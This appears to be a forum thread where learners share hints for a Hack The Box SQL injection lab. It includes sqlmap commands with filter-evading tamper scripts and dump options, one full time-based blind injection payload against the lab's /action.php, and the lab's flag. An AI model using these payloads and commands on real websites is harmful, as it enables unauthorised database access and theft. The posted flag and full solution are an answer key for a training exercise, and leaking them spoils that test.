The 4 is correct, worked for me. You can PM your flag chars (randomised if you want) and I could help.
Otherwise try again, the 1337 reads right to me.
The 4 is correct, worked for me. You can PM your flag chars (randomised if you want) and I could help.
Otherwise try again, the 1337 reads right to me.
Finally got it, whooa a lot of requests to be made. Be patient, if anyone needs help, DM me.
It will seem that the protection is not present till you get struck in errors
just use -v 6to see whats going on and see what was taught for such scenarios
see what is being send and recieved
For anyone who is still struggling: do not tamper with the POST request you get. Save the original one and use it with -r switch. Everything from then on should be straight-forward. If it’s not, something is wrong with the request. I tampered with it and made me absolutely crazy not being able to figure out what’s wrong and how to fix it.
Here are some tips to keep in mind:
Take things one step at a time and don’t try to apply all the hints and tips at once.
If you find yourself struggling to make progress, ensure that you are executing the hints in the right context and with the correct command.
If you can’t seem to make any progress, start from scratch and begin with the basics.
Remember that the two most important things to keep in mind are the techniques and the tamper option.
Very nicely put, dont forget you dont need to apply everything SQLMAP suggests, you can try one thing at a time and check the results after, in short:
if SQLMAP suggests adding 2 things, just add 1 of them and check.
sqlmap -r --tamper= -T table name --dump --batch (This is a format not an answer)
Also flag you will find will throw some error for that just remove b and put _ over there in flag
Happy hacking
This one was difficult, get the post request manually, and use the ‘between’ tamper.
Tips After Finding the Flag:
Identify the Website Technology:
Analyze Each Page Source Code:
CTRL + F
to search for files with the website’s file extension (e.g., .php
).Understand the Page Actions:
Intercept and Save the Request:
Use SQLMap with the Tamper Script:
sqlmap -r <file> --batch --tamper=<tamper script used in the module>
between
, space2comment
--tamper=<tamper1>,<tamper2>
Wait for Results:
Determine the Payload Type:
Run Multiple Tabs for Faster Analysis:
--technique=<types> --no-cast --dbs
Analyze and Extract Data:
-D <database_name> --tables
for each tab to list the tables and proceed with further steps as needed.I hope it helps you other than to be useless words
mdso999
The solution :
Check the source code of the page : /shop.html
At the bottom, you will find a js script which call the file “/action.php” with the JSON payload {id:1}
The sqli payload : {“id”:“1, 313, 1,712,IF(1=(SELECT 1 FROM final_flag WHERE content LIKE ‘HTB{N07\_50\_H4RD\_R16H7?!}’), SLEEP(2), 1 ))#”}
Flag : HTB{N07_50_H4RD_R16H7?!}
Guys, copy the request in JSON format (where the id
parameter is) and use it for scanning with the -r request.txt
flag. Also, add --tamper=between,space2comment
, and everything will work.
sqlmap.py -r req.txt --batch --tamper=between,space2comment --dbs